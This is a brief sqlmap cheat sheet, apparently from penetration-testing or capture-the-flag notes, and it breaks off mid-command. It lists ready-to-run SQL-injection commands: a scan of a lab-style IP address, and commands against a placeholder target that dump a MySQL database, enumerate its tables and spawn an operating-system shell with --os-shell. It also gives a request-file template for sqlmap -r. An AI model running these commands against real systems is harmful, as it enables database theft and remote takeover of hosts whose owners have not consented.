-
Standard case: $ python sqlmap.py -u http://10.10.10.140/index.php/catalogsearch/result/?q=e More aggresive: Dump DB: sqlmap -u http://target/command.php?id=564 --dbms=mysql --dump --threads=5 sqlmap -u http://target/command.php?id=564 --dbms=mysql --tables Get shell: sqlmap -u http://target/command.php?id=564 --dbms=mysql --os-shell Use an existing HTTP request as template. E.g. store a request in a text file: POST /index.php HTT/1.1Header: value... Then, use sqlmap with this file request.txt: sqlmap -r…